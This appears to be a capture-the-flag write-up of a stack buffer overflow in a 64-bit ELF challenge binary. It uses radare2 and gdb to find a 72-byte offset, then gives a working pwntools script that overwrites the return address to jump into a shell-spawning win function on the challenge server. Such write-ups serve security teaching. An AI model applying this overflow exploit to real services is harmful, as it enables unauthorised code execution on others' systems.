![3ba8fbe5e255c70c29fccc800a95390b.png](721577ea7fd748ceb708479a2b5b75d3.png) Taking a look at the file we see that it's **ELF 64-bit** ``` ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=ae6fb7020a27e2fdccdb6826a57ccc5bfc0d127a, not stripped ``` Loading it in to **radare 2** and listing the functions we can see that there is a **win** function ![1c47e6611914b5e056810c53bb25d00b.png](b534e32c13434280bb405f3d3b750fea.png) Disassembling that function with `pdf @sym.main` ![e8c2e08aa304218deaf7b7e46cf86239.png](36066f0f53284759b863fd6842427d43.png) There's a lot going on. Looks like when the function is called it's checking for two arguments `0xdeadbeef` and `0x1337c0de` and then it gives us a shell? What if we skip the variable checks completely and jump to `0x004006cf`? ![cf83187a50f22756bcc76e1a9e827fdc.png](e4ba8524d894495ab9b700a5099033b0.png) Loading the binary into **gdb** (using gef support), we can start poking at it and try to find the offset I was having issues with `pattern create/search` so I did it the old fashioned way: sending lots of 'A's and 'B's until something looked neat Using **gdb with gef** you can use `pi print('A'*100)` to quickly toss a string of characters together After sending different lenghts, I found that **72** was when we started seeing the 'B' characters leak in `pi print('A'*72 + 'B')` ![1d0c2ad3a03f013ae93ae75efe95b26e.png](4bb7af9cbe2c43938ab82bd141c02638.png) Things we know: 1. The offset is **72** 2. The address we want to jump to is **0x004006cf** 3. It's an **ELF 64-bit** binary That's enough to write a script using **Pwntools**. Here's mine ```Python from pwn import * p = remote('dctf-chall-pwn-sanity-check.westeurope.azurecontainer.io', 7480) offset = b'A' * 72 print(p.recvuntil('joke\n')) p.sendline(offset + p64(0x004006cf)) p.interactive() ``` The `p64(0x004006cf)` function call packs the address in **Little Endian** format, required to be passed, and `p.interactive()` just catches the shell and allows us to send input. ![09a1d31923b3c137fd108739b380d6c1.png](fdab4da1fdbc4d5db1aa5f916c4deecf.png) --- Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]] Tags: #ctf #exploit_development #buffer_overflow Related: